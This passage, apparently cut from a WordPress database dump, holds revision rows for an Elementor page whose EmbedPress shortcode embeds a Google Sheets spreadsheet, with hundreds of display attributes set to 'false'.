embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g/edit?gid=101226550#gid=101226550[/embedpress]','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:49:39','2025-07-01 07:49:39','',1571,'http://pakhaeng.ssk.in.th/?p=1587',0,'revision','',0),
(1589,1,'2025-07-01 14:54:25','2025-07-01 07:54:25','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g/edit?gid=101226550#gid=101226550\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' 